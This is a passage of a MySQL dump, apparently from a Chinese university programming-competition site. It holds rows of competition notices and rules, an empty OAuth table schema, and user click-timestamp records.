17:25:16'),(6,46,'即日起-11月30日,每周五下午17:00排行第一的团队将获封“周冠军”称号,会有神秘奖励哦!','将详细比赛科目和参赛细则现在已经上传至比赛板块资料下载区,供已报名参赛的队伍下载。','notice',9,'Competition','2019-10-30 17:37:02','2019-10-30 17:37:02'),(7,50,NULL,'搜索搜索','manual',12,'Competition','2019-11-05 17:34:54','2019-11-05 17:34:54'),(8,46,'即日起-11月30日,每周五下午17:00排行第一的团队将获封“周冠军”称号,会有神秘奖励哦!','将详细比赛科目和参赛细则现在已经上传至比赛板块资料下载区,供已报名参赛的队伍下载。','notice',11,'Competition','2019-11-06 08:50:53','2019-11-06 08:50:53'),(9,46,NULL,'比赛详细信息及相关注意事项。','manual',11,'Competition','2019-11-06 08:53:01','2019-11-06 08:53:01'),(10,46,NULL,'第一阶段积分排名\r\n科大01\r\n海狮队','rank',11,'Competition','2019-11-06 17:26:52','2019-11-07 09:24:03'),(11,50,NULL,'比赛详细信息及相关注意事项。','manual',15,'Competition','2019-11-10 14:02:06','2019-11-10 14:02:06'),(13,50,'注意事项','并加入官方的微信群,了解规则等。\r\n为什么没有显示','notice',15,'Competition','2019-11-10 14:04:46','2020-08-21 09:04:51'),(14,50,'官方微信群','请同学们加入官方微信群15644444444','notice',15,'Competition','2019-11-10 14:05:51','2019-11-10 14:05:51'),(16,1,'公告1','1. 1. 阿斯蒂芬1. a\'s\'d\'f1. 1. 1. 阿道夫1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 阿达- 阿道夫- - - 阿斯蒂**啊`阿达`**\r\n似懂非懂','notice',21,'Competition','2020-03-18 16:48:00','2020-03-18 16:48:00'),(17,1,NULL,'水水水水水水水水水水水水水水水水水水水\r\n阿斯蒂芬\r\n阿斯蒂芬 asd啊\r\n阿斯蒂芬\r\n阿达\r\n阿斯蒂\r\n阿斯蒂\r\n阿斯蒂','rank',21,'Competition','2020-03-18 16:48:54','2020-03-18 16:48:54'),(19,1,'请同学们积极报名',' 为积极推进大学生创新创业,培养大学生创新思维和利用计算机分析问题、解决问题的实际能力,提升学生的综合素质,丰富校园学术文化氛围,促进校际交流。由上海理工大学公共实验中心、教务处、创新创业学院主办,联想集团赞助,计算中心承办的“联想杯全国高校程序设计在线邀请赛暨第三届上海理工大学程序设计竞赛”,诚邀全国高校所有在校学生和程序设计爱好者参赛。赛事具体安排如下:\r\n\r\n竞赛时间:2020年05月30日12:00--17:00(个人赛)\r\n\r\n竞赛平台:https://acm.ecnu.edu.cn/contest/\r\n\r\n竞赛语言:C','notice',25,'Competition','2020-08-17 15:11:35','2020-08-20 15:14:27'),(22,1,'报名通知公告','为积极推进大学生创新创业,培养大学生创新思维和利用计算机分析问题、解决问题的实际能力,提升学生的综合素质,丰富校园学术文化氛围,促进校际交流。由上海理工大学公共实验中心、教务处、创新创业学院主办,联想集团赞助,计算中心承办的“联想杯全国高校程序设计在线邀请赛暨第三届上海理工大学程序设计竞赛”,诚邀全国高校所有在校学生和程序设计爱好者参赛。赛事具体安排如下:\r\n\r\n竞赛时间:2020年05月30日12:00--17:00(个人赛)\r\n\r\n竞赛平台:https://acm.ecnu.edu.cn/contest/\r\n\r\n竞赛语言:C、C++( C++11, C++14, C++17)、Java( Java 8)、Python(Python 2,Python 3,PyPy 2,PyPy 3)、Pascal,参赛者可选择上述任意一种语言提交答案','notice',24,'Competition','2020-08-17 15:27:29','2020-08-17 15:27:29'),(23,1,NULL,'竞赛细则:\r\n\r\n参赛者以个人身份独立参赛,年级、专业不限。\r\n\r\n赛事采用同一套赛题,同一时间开赛,统一评分规则。\r\n\r\n赛事时长5小时,竞赛中,赛事主办方可根据赛事情况调整竞赛时长,当竞赛时长发生改变时,主办方将及时通告所有参赛选手。\r\n\r\n赛事设13道编程题(英文题面),涉及知识点包括模拟、排序与二分查找、枚举、递归与递推、高精度大数据计算、贪心算法、动态规划算法、搜索算法、图论、数论以及高级数据结构等方面的内容。\r\n\r\n参赛者在竞赛期间可以查阅诸如书籍、字典、手册、程序清单等文字性参考资料。\r\n\r\n参赛者有权对赛题描述中的不明确或错误的部分提问,如果裁判确认赛题中确实存在不明确或错误的部分,将会通过比赛系统通告所有参赛者进行声明或更正;赛事裁判老师不会就赛题的具体算法思路进行任何回答。\r\n\r\n竞赛过程中禁止拷贝任何网上和他人的代码,一旦在赛后代码查重过程中发现存在抄袭行为,将取消竞赛成绩并予以通报。\r\n\r\n\r\n\r\n评分细则:\r\n\r\n参赛者试题的解答结果通过竞赛平台提交,由竞赛平台在线自动判定,判定结果在竞赛平台展示给参赛学生。\r\n\r\n所有“有正确提交”的参赛同学都将进行系统排名。\r\n\r\n如果有多名同学的解题数量相同,根据总用时加上惩罚时间进行排名。总用时和惩罚时间由每道解答正确的试题的用时加上惩罚时间而成。每道试题用时将从竞赛开始到试题解答被判定为正确为止,其间每一次错误的运行将被加罚20分钟时间,未正确解答的试题不计时。\r\n\r\n为保证赛事公平、公正,赛事组织方对所有参赛者提交的代码进行查重,一经发现存在相互抄袭、赋值的赛题代码,则直接取消相关参赛者竞赛成绩,追回所发放奖品。\r\n\r\n\r\n\r\n奖项设置与评奖细则:\r\n\r\n奖项按上海理工大学校内参赛奖项与校外参赛奖项设置\r\n\r\n校内奖项设置:设特等奖:1名(可空缺);一等奖:人数为校内参赛人数的10%;二等奖:人数为校内参赛人数的20%;三等奖:人数为校内参赛人数的30%;获奖者可获得由赛事主办方盖章的证书;根据获奖成绩排名及个人意愿选拔第五届“中国高校计算机大赛-团体程序设计天梯赛”参赛选手。\r\n\r\n校外设特等奖:1名(可空缺);一等奖:10人;二等奖:40人;三等奖:50人;获奖者可获精美奖品。\r\n\r\n','manual',24,'Competition','2020-08-17 15:28:36','2020-08-17 15:28:36'),(27,1,'报名通知公告','啊','notice',24,'Competition','2020-08-21 09:08:35','2020-08-21 09:08:35'),(28,1,NULL,'1','rank',24,'Competition','2020-08-21 09:11:48','2020-08-21 15:13:05'),(29,47,NULL,'排行榜中的成绩只是2018年6月10日竞赛时间段的成绩展示。\r\n第一阶段:09:00~10:00\r\n第二阶段:10:00~17:30\r\n第三阶段:11:30~17:30\r\n排行榜名次评定规则:\r\n总得分 = 第一阶段得分 + 第二阶段得分 + 第三阶段得分。按总得分的成绩高低排名。\r\n若总得分相同,依据总耗时长短,耗时短者排名靠前。若耗时相同依据模拟赛成绩高低,高分者排名靠前\r\n每个题都可以多次评测,第三阶段将取成绩最高值。\r\n最终排名:预赛成绩20%**、决赛成绩80%**','rank',25,'Competition','2020-08-21 10:39:47','2020-09-11 15:55:11'),(30,111,NULL,'一、大赛目的\r\n\r\n为推动电气工程及其自动化、自动化、测控技术与仪器和相关电子信息类相关专业的教学改革,在学校、学院的统一组织和引导下,以参赛学生独立自主完成为原则,达到锻炼学生主动思考和发现问题的能力,培养学生的协作精神和创新意识,促进理论与实际相结合,夯实学生软件编程基础,提高学生运用C语言解决工程技术实际问题的能力的目的。\r\n\r\n二、组织机构\r\n\r\n本次竞赛由教务处主办,电气工程学院、信息科学与工程学院联合承办,为保证本次竞赛的顺利进行,竞赛特设组织委员会、评审委员会、秘书处及指导委员会。组委会负责竞赛的组织和协调工作;评委会由组委会聘请专家、专业教师组成,负责竞赛作品的评审。秘书处设在电气工程学院学工办,负责竞赛的具体组织等的准备工作。指导委员会负责竞赛题目的制定,负责在竞赛过程中解答并解释与题目本身相关的问题。\r\n\r\n(一)竞赛组织委员会\r\n\r\n主 任:祝玉华\r\n\r\n副主任:刘楠嶓 从沛杰 张德贤 胡继云\r\n\r\n成员: 卢涛 邓淼磊 张石 徐回忆\r\n\r\n(二)竞赛评审委员会\r\n\r\n主 任:刘楠嶓 从沛杰 张德贤\r\n\r\n副主任:卢涛 邓淼磊\r\n\r\n成员:徐回忆 郑维 肖乐 张春燕\r\n\r\n(三)竞赛秘书处\r\n\r\n秘书长:张石\r\n\r\n副秘书长:孙红\r\n\r\n成员:王燕平 陈富安 王学梅\r\n\r\n(四)指导委员会\r\n\r\n主 任:徐回忆\r\n\r\n成员:郑维、李同涛、张杰、肖乐\r\n\r\n三、参赛对象及办法\r\n\r\n(一)参赛对象\r\n\r\n本次专业竞赛内容为检验参赛学生利用C语言程序设计在电子信息、自动化、电气及测控领域中的应用能力,凡我校在校本科生均可报名参加,其中电气工程学院2015级本科生需要全部参加,信息科学与工程学院电子信息工程及电子信息科学与技术专业自由组队参加,可个人参赛也可自由组队参加比赛,以组队参加为主。\r\n\r\n参赛个人或参赛队在所给出的题目(见附件2)范围内自主选择一道题目参赛,不得自拟题目,每个题目包含设计报告、基础及提高三个部分。 设计报告的完成及题目基础部分所规定功能的实现是判断是否完成该题目的依据,未完成题目基础部分的要求不予评审,题目提高部分为加分项。最终提交软件作品(含源代码、可执行文件)及设计报告,以电子版形式提交。\r\n\r\n(二)竞赛办法\r\n\r\n1、报名办法\r\n\r\n参赛者从网上自动下载报名表(见附件1),组队参赛每队不超过3人,作品完成后以班级为单位交到电气学院学工办,请各学院将报名表统计后发送至电气学院学工办电子邮箱:dqxgb@haut.edu.cn,名额不限。\r\n\r\n2、报名时间:7月5日截止;\r\n\r\n3、地点:电气学院学工办,联系人:孙老师;电话:67758823\r\n\r\n四、竞赛指南\r\n\r\n竞赛内容考查参赛选手的C语言程序设计在电子信息、自动化、电气及仪器仪表领域的应用设计能力,本次竞赛编程开发环境一律采用标准C, 如Turbo C结构化编程工具进行软件设计,不允许使用Visual C++等面向对象开发工具, 所设计的程序软件需涵盖C语言的基本程序设计要点,要点如下:\r\n\r\nC语言的结构,包括头文件、main函数、数据说明、代码的书写格式及风格;数据类型及其运算,基本语句的使用,字符串和数组;函数、参数、局部和全局变量,内部与外部函数;指针与变量,指针与函数的使用;综合使用结构体、指针和函数对各种数据结构的表示和处理;常用函数库、字符串处理、文件输入输出、内存管理等。\r\n\r\n根据以上要点要求,在所规定的题目内自主选择一道题目,要求所开发的软件功能完善,有软件操作的菜单或界面方便人机交互,代码结构及书写符合规范,符合软件工程要求,有软件源程序、可执行程序及软件设计报告,以刻录光盘形式提交,刻录光盘含源程序代码、可执行文件及相应运行支持文件库,同时提交软件设计报告纸质文档。\r\n\r\n比赛评审阶段将采取软件自动比对,不同参赛个人或参赛队所提交的设计报告和源代码如内容出现30%以上雷同,则视为作弊取消参赛资格。\r\n\r\n最终软件作品以所用开发语言及工具实现该设计的难度、功能实现的完整性、程序结构及代码书写的规范性、运行的稳定性、界面及操作过程的逻辑性、友好性和文档书写的规范性等综合考虑评估。\r\n\r\n五、作品提交时间及要求\r\n\r\n2016至2017学年第一学期开学八周内,各参赛队(个人)以学院为单位将最终作品(含设计报告、源代码和可执行文件的电子版)提交到电气工程学院学工办。\r\n\r\n作品提交含设计报告与软件作品两方面,均以电子版形式提交。其中,软件作品含源程序文件和可执行程序。其中可执行程序能够脱离开发环境单独运行,提供必要的独立运行支持库文件。\r\n\r\n地点:电气学院学工办,联系人:孙红 ,电话: 67758823\r\n\r\n六、作品评审与奖励\r\n\r\n作品按时提交后,首先由各学院以系为单位进行评审,按50%的比例评审出推荐作品提交大赛评审委员会,大赛评审委员会进行评奖,励范围原则上不超过参赛学生的50%,壹等奖、贰等奖和叁等奖的获奖比例原则上为1:2:3。\r\n\r\n奖励证书由学校统一印制。\r\n\r\n\r\n教务处 电气工程学院 信息科学与工程学院','manual',25,'Competition','2020-08-24 16:31:18','2020-10-19 08:43:40'),(31,111,'测试通知公告333','一、大赛目的\r\n为推动电气工程及其自动化、自动化、测控技术与仪器和相关电子信息类相关专业的教学改革,在学校、学院的统一组织和引导下,以参赛学生独立自主完成为原则,达到锻炼学生主动思考和发现问题的能力,培养学生的协作精神和创新意识,促进理论与实际相结合,夯实学生软件编程基础,提高学生运用C语言解决工程技术实际问题的能力的目的。\r\n二、组织机构\r\n本次竞赛由教务处主办,电气工程学院、信息科学与工程学院联合承办,为保证本次竞赛的顺利进行,竞赛特设组织委员会、评审委员会、秘书处及指导委员会。组委会负责竞赛的组织和协调工作;评委会由组委会聘请专家、专业教师组成,负责竞赛作品的评审。秘书处设在电气工程学院学工办,负责竞赛的具体组织等的准备工作。指导委员会负责竞赛题目的制定,负责在竞赛过程中解答并解释与题目本身相关的问题。\r\n(一)竞赛组织委员会\r\n主 任:祝玉华\r\n副主任:刘楠嶓 从沛杰 张德贤 胡继云\r\n成员: 卢涛 邓淼磊 张石 徐回忆\r\n(二)竞赛评审委员会\r\n主 任:刘楠嶓 从沛杰 张德贤\r\n副主任:卢涛 邓淼磊\r\n成员:徐回忆 郑维 肖乐 张春燕\r\n(三)竞赛秘书处\r\n秘书长:张石\r\n副秘书长:孙红\r\n成员:王燕平 陈富安 王学梅\r\n(四)指导委员会\r\n主 任:徐回忆\r\n成员:郑维、李同涛、张杰、肖乐\r\n三、参赛对象及办法\r\n(一)参赛对象\r\n本次专业竞赛内容为检验参赛学生利用C语言程序设计在电子信息、自动化、电气及测控领域中的应用能力,凡我校在校本科生均可报名参加,其中电气工程学院2015级本科生需要全部参加,信息科学与工程学院电子信息工程及电子信息科学与技术专业自由组队参加,可个人参赛也可自由组队参加比赛,以组队参加为主。\r\n参赛个人或参赛队在所给出的题目(见附件2)范围内自主选择一道题目参赛,不得自拟题目,每个题目包含设计报告、基础及提高三个部分。 设计报告的完成及题目基础部分所规定功能的实现是判断是否完成该题目的依据,未完成题目基础部分的要求不予评审,题目提高部分为加分项。最终提交软件作品(含源代码、可执行文件)及设计报告,以电子版形式提交。\r\n(二)竞赛办法\r\n1、报名办法\r\n参赛者从网上自动下载报名表(见附件1),组队参赛每队不超过3人,作品完成后以班级为单位交到电气学院学工办,请各学院将报名表统计后发送至电气学院学工办电子邮箱:dqxgb@haut.edu.cn,名额不限。\r\n2、报名时间:7月5日截止;\r\n3、地点:电气学院学工办,联系人:孙老师;电话:67758823\r\n四、竞赛指南\r\n竞赛内容考查参赛选手的C语言程序设计在电子信息、自动化、电气及仪器仪表领域的应用设计能力,本次竞赛编程开发环境一律采用标准C, 如Turbo C结构化编程工具进行软件设计,不允许使用Visual C++等面向对象开发工具, 所设计的程序软件需涵盖C语言的基本程序设计要点,要点如下:\r\nC语言的结构,包括头文件、main函数、数据说明、代码的书写格式及风格;数据类型及其运算,基本语句的使用,字符串和数组;函数、参数、局部和全局变量,内部与外部函数;指针与变量,指针与函数的使用;综合使用结构体、指针和函数对各种数据结构的表示和处理;常用函数库、字符串处理、文件输入输出、内存管理等。\r\n根据以上要点要求,在所规定的题目内自主选择一道题目,要求所开发的软件功能完善,有软件操作的菜单或界面方便人机交互,代码结构及书写符合规范,符合软件工程要求,有软件源程序、可执行程序及软件设计报告,以刻录光盘形式提交,刻录光盘含源程序代码、可执行文件及相应运行支持文件库,同时提交软件设计报告纸质文档。\r\n比赛评审阶段将采取软件自动比对,不同参赛个人或参赛队所提交的设计报告和源代码如内容出现30%以上雷同,则视为作弊取消参赛资格。\r\n最终软件作品以所用开发语言及工具实现该设计的难度、功能实现的完整性、程序结构及代码书写的规范性、运行的稳定性、界面及操作过程的逻辑性、友好性和文档书写的规范性等综合考虑评估。\r\n五、作品提交时间及要求\r\n2016至2017学年第一学期开学八周内,各参赛队(个人)以学院为单位将最终作品(含设计报告、源代码和可执行文件的电子版)提交到电气工程学院学工办。\r\n作品提交含设计报告与软件作品两方面,均以电子版形式提交。其中,软件作品含源程序文件和可执行程序。其中可执行程序能够脱离开发环境单独运行,提供必要的独立运行支持库文件。\r\n地点:电气学院学工办,联系人:孙红 ,电话: 67758823\r\n六、作品评审与奖励\r\n作品按时提交后,首先由各学院以系为单位进行评审,按50%的比例评审出推荐作品提交大赛评审委员会,大赛评审委员会进行评奖,励范围原则上不超过参赛学生的50%,壹等奖、贰等奖和叁等奖的获奖比例原则上为1:2:3。\r\n奖励证书由学校统一印制。\r\n学分获取按照《河南工业大学学生校内专业竞赛管理办法(试行)》(校政教〔2014〕10号)规定执行。\r\n教务处 电气工程学院 信息科学与工程学院','notice',25,'Competition','2020-08-25 18:23:59','2020-09-11 15:30:10'),(32,111,NULL,'很好','manual',26,'Competition','2020-09-17 11:16:50','2020-09-17 11:16:50'),(33,1,'a\'s\'d\'fa\'s\'d\'f',' 阿斯顿发射点','notice',28,'Competition','2021-02-24 08:25:11','2021-02-24 08:25:11');
|
||
/*!40000 ALTER TABLE `notices` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `oauths`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `oauths`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `oauths` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`client_id` varchar(255) DEFAULT NULL,
|
||
`client_secret` varchar(255) DEFAULT NULL,
|
||
`code` varchar(255) DEFAULT NULL,
|
||
`redirect_uri` varchar(255) DEFAULT NULL,
|
||
`scope` varchar(255) DEFAULT NULL,
|
||
`access_token` varchar(255) DEFAULT NULL,
|
||
`refresh_token` varchar(255) DEFAULT NULL,
|
||
`token_created_at` int(11) DEFAULT NULL,
|
||
`token_expires_in` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`user_id` int(11) DEFAULT '0',
|
||
`gitea_oauth_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_oauths_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `oauths`
|
||
--
|
||
|
||
LOCK TABLES `oauths` WRITE;
|
||
/*!40000 ALTER TABLE `oauths` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `oauths` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `onclick_times`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `onclick_times`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `onclick_times` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`onclick_time` datetime DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_onclick_times_on_onclick_time` (`onclick_time`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=219 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `onclick_times`
|
||
--
|
||
|
||
LOCK TABLES `onclick_times` WRITE;
|
||
/*!40000 ALTER TABLE `onclick_times` DISABLE KEYS */;
|
||
INSERT INTO `onclick_times` VALUES (1,2,'2018-07-02 11:27:49','2018-07-02 11:27:49','2018-07-02 11:27:49'),(2,1,'2021-03-10 17:13:20','2018-07-06 10:06:12','2021-03-10 17:13:20'),(3,3,'2018-07-06 10:52:18','2018-07-06 10:52:18','2018-07-06 10:52:18'),(4,4,'2018-07-19 09:49:23','2018-07-08 10:28:20','2018-07-19 09:49:23'),(5,5,'2019-01-15 09:35:32','2018-07-20 09:16:39','2019-01-15 09:35:32'),(6,6,'2019-08-16 07:28:32','2018-07-20 14:47:43','2019-08-16 07:28:32'),(7,7,'2018-08-03 15:43:55','2018-07-30 09:39:16','2018-08-03 15:43:55'),(8,8,'2019-09-20 09:32:55','2018-08-03 19:28:18','2019-09-20 09:32:55'),(9,9,'2018-11-14 15:38:13','2018-08-06 15:18:46','2018-11-14 15:38:13'),(10,10,'2018-08-06 15:24:58','2018-08-06 15:24:58','2018-08-06 15:24:58'),(11,11,'2018-08-21 17:13:35','2018-08-21 17:13:35','2018-08-21 17:13:35'),(12,12,'2018-08-22 15:59:03','2018-08-22 15:59:03','2018-08-22 15:59:03'),(13,13,'2018-08-30 22:28:07','2018-08-30 22:28:07','2018-08-30 22:28:07'),(14,14,'2018-09-05 13:54:44','2018-09-05 13:54:44','2018-09-05 13:54:44'),(15,15,'2018-11-13 11:02:42','2018-09-07 12:37:19','2018-11-13 11:02:42'),(16,16,'2019-09-17 16:20:32','2018-10-10 09:29:20','2019-09-17 16:20:32'),(17,17,'2018-10-12 17:36:42','2018-10-12 17:36:42','2018-10-12 17:36:42'),(18,18,'2018-12-19 09:06:30','2018-12-19 09:06:30','2018-12-19 09:06:30'),(19,19,'2019-01-17 19:54:34','2019-01-15 09:36:50','2019-01-17 19:54:34'),(20,20,'2019-10-19 08:55:16','2019-01-18 09:54:22','2019-10-19 08:55:16'),(21,21,'2019-01-25 11:44:49','2019-01-25 11:44:49','2019-01-25 11:44:49'),(22,22,'2019-01-25 11:44:49','2019-01-25 11:44:49','2019-01-25 11:44:49'),(23,23,'2019-01-25 11:44:49','2019-01-25 11:44:49','2019-01-25 11:44:49'),(24,24,'2019-01-25 11:44:49','2019-01-25 11:44:49','2019-01-25 11:44:49'),(25,25,'2019-01-25 11:44:49','2019-01-25 11:44:50','2019-01-25 11:44:50'),(26,26,'2019-09-09 15:31:48','2019-01-25 11:44:50','2019-09-09 15:31:48'),(27,27,'2019-01-25 11:44:50','2019-01-25 11:44:50','2019-01-25 11:44:50'),(28,28,'2019-03-04 11:23:54','2019-01-25 11:44:50','2019-03-04 11:23:54'),(29,29,'2019-04-04 09:52:11','2019-01-25 11:44:50','2019-04-04 09:52:11'),(30,30,'2019-01-25 11:44:50','2019-01-25 11:44:50','2019-01-25 11:44:50'),(31,31,'2019-03-22 16:57:50','2019-03-13 16:32:19','2019-03-22 16:57:50'),(32,32,'2019-10-28 17:43:15','2019-03-13 16:32:20','2019-10-28 17:43:15'),(33,33,'2019-03-13 16:32:20','2019-03-13 16:32:20','2019-03-13 16:32:20'),(34,34,'2019-03-13 16:32:20','2019-03-13 16:32:20','2019-03-13 16:32:20'),(35,35,'2019-03-13 16:32:20','2019-03-13 16:32:20','2019-03-13 16:32:20'),(36,36,'2019-03-13 16:32:20','2019-03-13 16:32:20','2019-03-13 16:32:20'),(37,37,'2019-03-13 16:32:20','2019-03-13 16:32:20','2019-03-13 16:32:20'),(38,38,'2019-03-13 16:32:20','2019-03-13 16:32:20','2019-03-13 16:32:20'),(39,39,'2019-03-13 16:32:21','2019-03-13 16:32:21','2019-03-13 16:32:21'),(40,40,'2019-03-13 16:32:21','2019-03-13 16:32:21','2019-03-13 16:32:21'),(41,41,'2019-10-28 15:11:27','2019-03-21 21:28:44','2019-10-28 15:11:27'),(42,42,'2019-04-09 15:27:41','2019-04-09 15:27:41','2019-04-09 15:27:41'),(43,43,'2019-04-17 09:49:36','2019-04-17 09:49:36','2019-04-17 09:49:36'),(44,44,'2019-04-18 11:06:17','2019-04-18 11:06:17','2019-04-18 11:06:17'),(45,45,'2020-03-27 19:19:01','2019-06-09 11:31:04','2020-03-27 19:19:01'),(46,46,'2021-01-11 15:33:58','2019-08-06 08:33:43','2021-01-11 15:33:58'),(47,47,'2020-08-26 09:41:46','2019-08-06 09:10:25','2020-08-26 09:41:46'),(48,48,'2021-02-04 15:15:35','2019-08-06 09:24:30','2021-02-04 15:15:35'),(49,49,'2021-03-10 15:51:08','2019-08-07 09:33:05','2021-03-10 15:51:08'),(50,50,'2019-11-22 08:52:49','2019-08-07 09:37:08','2019-11-22 08:52:49'),(51,51,'2019-08-07 14:53:28','2019-08-07 14:53:28','2019-08-07 14:53:28'),(52,52,'2019-11-11 14:18:55','2019-08-07 15:44:39','2019-11-11 14:18:55'),(53,53,'2019-08-23 17:08:38','2019-08-13 09:30:25','2019-08-23 17:08:38'),(54,54,'2019-08-14 16:50:06','2019-08-14 16:50:06','2019-08-14 16:50:06'),(55,55,'2020-08-21 11:54:43','2019-08-17 08:59:42','2020-08-21 11:54:43'),(56,56,'2019-09-16 09:59:25','2019-09-16 09:59:25','2019-09-16 09:59:25'),(57,57,'2019-10-10 16:48:10','2019-10-10 16:48:10','2019-10-10 16:48:10'),(58,58,'2019-10-24 17:03:53','2019-10-19 09:24:20','2019-10-24 17:03:53'),(60,60,'2019-10-29 10:00:26','2019-10-29 10:00:26','2019-10-29 10:00:26'),(61,61,'2019-10-29 18:43:24','2019-10-29 17:07:24','2019-10-29 18:43:24'),(62,62,'2019-10-29 17:08:25','2019-10-29 17:08:25','2019-10-29 17:08:25'),(63,63,'2020-09-15 16:45:19','2019-10-31 18:37:10','2020-09-15 16:45:19'),(64,64,'2019-12-30 16:41:03','2019-10-31 18:37:10','2019-12-30 16:41:03'),(65,65,'2020-03-23 15:27:24','2019-10-31 18:37:10','2020-03-23 15:27:24'),(66,66,'2020-09-09 10:52:42','2019-10-31 18:37:10','2020-09-09 10:52:42'),(67,67,'2019-10-31 18:37:10','2019-10-31 18:37:10','2019-10-31 18:37:10'),(68,68,'2019-10-31 18:37:11','2019-10-31 18:37:11','2019-10-31 18:37:11'),(69,69,'2019-10-31 18:37:11','2019-10-31 18:37:11','2019-10-31 18:37:11'),(70,70,'2019-10-31 18:37:11','2019-10-31 18:37:11','2019-10-31 18:37:11'),(71,71,'2019-11-05 17:24:26','2019-10-31 18:37:11','2019-11-05 17:24:26'),(73,73,'2021-02-22 16:47:10','2019-11-25 11:25:31','2021-02-22 16:47:10'),(74,74,'2020-02-01 12:47:12','2020-02-01 12:47:12','2020-02-01 12:47:12'),(75,75,'2020-02-11 16:32:26','2020-02-01 18:52:39','2020-02-11 16:32:26'),(76,76,'2020-03-19 15:21:58','2020-02-01 20:34:46','2020-03-19 15:21:58'),(77,77,'2020-02-05 10:01:55','2020-02-01 22:26:36','2020-02-05 10:01:55'),(78,78,'2020-02-03 17:19:19','2020-02-03 17:19:19','2020-02-03 17:19:19'),(79,79,'2020-02-04 22:56:49','2020-02-04 22:00:19','2020-02-04 22:56:49'),(80,80,'2020-02-24 17:50:10','2020-02-04 22:09:45','2020-02-24 17:50:10'),(81,81,'2020-02-11 22:13:23','2020-02-05 10:29:30','2020-02-11 22:13:23'),(82,82,'2020-02-20 14:51:35','2020-02-05 10:30:48','2020-02-20 14:51:35'),(83,83,'2020-02-11 11:32:26','2020-02-05 10:31:59','2020-02-11 11:32:26'),(84,84,'2020-02-11 09:38:13','2020-02-05 10:33:10','2020-02-11 09:38:13'),(85,85,'2020-02-05 10:35:26','2020-02-05 10:35:26','2020-02-05 10:35:26'),(86,86,'2020-02-11 10:44:21','2020-02-05 10:38:36','2020-02-11 10:44:21'),(87,87,'2020-02-05 10:39:59','2020-02-05 10:39:59','2020-02-05 10:39:59'),(88,88,'2020-02-05 10:43:18','2020-02-05 10:43:18','2020-02-05 10:43:18'),(89,89,'2020-02-11 11:28:27','2020-02-05 10:54:45','2020-02-11 11:28:27'),(90,90,'2020-02-11 17:09:12','2020-02-05 10:54:48','2020-02-11 17:09:12'),(91,91,'2020-02-11 10:37:59','2020-02-05 10:55:15','2020-02-11 10:37:59'),(92,92,'2020-02-11 10:28:23','2020-02-05 10:56:00','2020-02-11 10:28:23'),(93,93,'2020-02-05 10:58:38','2020-02-05 10:58:38','2020-02-05 10:58:38'),(94,94,'2020-02-11 09:37:57','2020-02-05 11:02:30','2020-02-11 09:37:57'),(95,95,'2020-02-05 11:05:02','2020-02-05 11:05:02','2020-02-05 11:05:02'),(96,96,'2020-02-05 11:24:55','2020-02-05 11:24:55','2020-02-05 11:24:55'),(97,97,'2020-02-12 08:09:43','2020-02-05 11:41:14','2020-02-12 08:09:43'),(98,98,'2020-02-11 11:07:09','2020-02-05 12:24:57','2020-02-11 11:07:09'),(99,99,'2020-02-11 15:38:03','2020-02-05 14:48:32','2020-02-11 15:38:03'),(100,100,'2020-02-05 14:53:15','2020-02-05 14:53:15','2020-02-05 14:53:15'),(101,101,'2020-02-05 15:22:57','2020-02-05 15:22:57','2020-02-05 15:22:57'),(102,102,'2020-02-05 16:25:27','2020-02-05 16:25:27','2020-02-05 16:25:27'),(103,103,'2020-02-11 09:51:08','2020-02-10 12:21:33','2020-02-11 09:51:08'),(104,104,'2020-03-19 13:54:38','2020-03-19 13:54:38','2020-03-19 13:54:38'),(105,105,'2020-03-19 15:08:51','2020-03-19 15:08:51','2020-03-19 15:08:51'),(106,106,'2020-03-19 15:09:00','2020-03-19 15:09:00','2020-03-19 15:09:00'),(107,107,'2020-03-19 15:10:11','2020-03-19 15:10:11','2020-03-19 15:10:11'),(108,108,'2020-03-19 15:12:55','2020-03-19 15:12:55','2020-03-19 15:12:55'),(109,109,'2020-03-19 15:13:24','2020-03-19 15:13:24','2020-03-19 15:13:24'),(110,110,'2020-03-23 08:27:59','2020-03-23 08:27:59','2020-03-23 08:27:59'),(111,111,'2020-09-22 09:49:17','2020-07-03 11:51:05','2020-09-22 09:49:17'),(112,112,'2020-08-12 10:41:20','2020-08-12 10:41:20','2020-08-12 10:41:20'),(113,113,'2020-08-13 10:19:02','2020-08-13 10:19:02','2020-08-13 10:19:02'),(114,114,'2020-08-18 09:00:40','2020-08-14 08:58:42','2020-08-18 09:00:40'),(115,115,'2020-09-03 08:27:58','2020-08-18 16:43:47','2020-09-03 08:27:58'),(116,116,'2020-09-29 17:20:40','2020-09-29 17:20:40','2020-09-29 17:20:40'),(117,117,'2020-10-21 16:47:58','2020-10-21 16:47:58','2020-10-21 16:47:58'),(118,118,'2020-12-01 18:18:16','2020-12-01 18:18:16','2020-12-01 18:18:16'),(119,119,'2020-12-02 13:18:32','2020-12-02 13:18:32','2020-12-02 13:18:32'),(120,120,'2020-12-14 14:31:53','2020-12-14 14:31:53','2020-12-14 